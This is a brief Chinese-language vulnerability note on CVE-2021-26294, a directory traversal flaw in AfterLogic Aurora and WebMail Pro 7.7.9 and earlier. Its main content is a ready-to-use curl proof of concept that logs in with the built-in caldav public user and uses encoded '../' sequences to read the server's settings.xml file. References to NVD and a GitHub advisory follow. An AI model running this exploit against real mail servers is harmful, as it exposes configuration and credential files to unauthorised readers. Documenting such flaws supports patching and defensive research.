WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294).md
576 B / 2021-05-21 09:14:38
# WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294)
7.7.9及所有更低版本的AfterLogic Aurora和WebMail Pro产品受影响,允许未经授权的攻击者读取文件,比如数据库/用户配置文件等。
PoC:
```
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
```
ref:
* https://nvd.nist.gov/vuln/detail/CVE-2021-26294
* https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md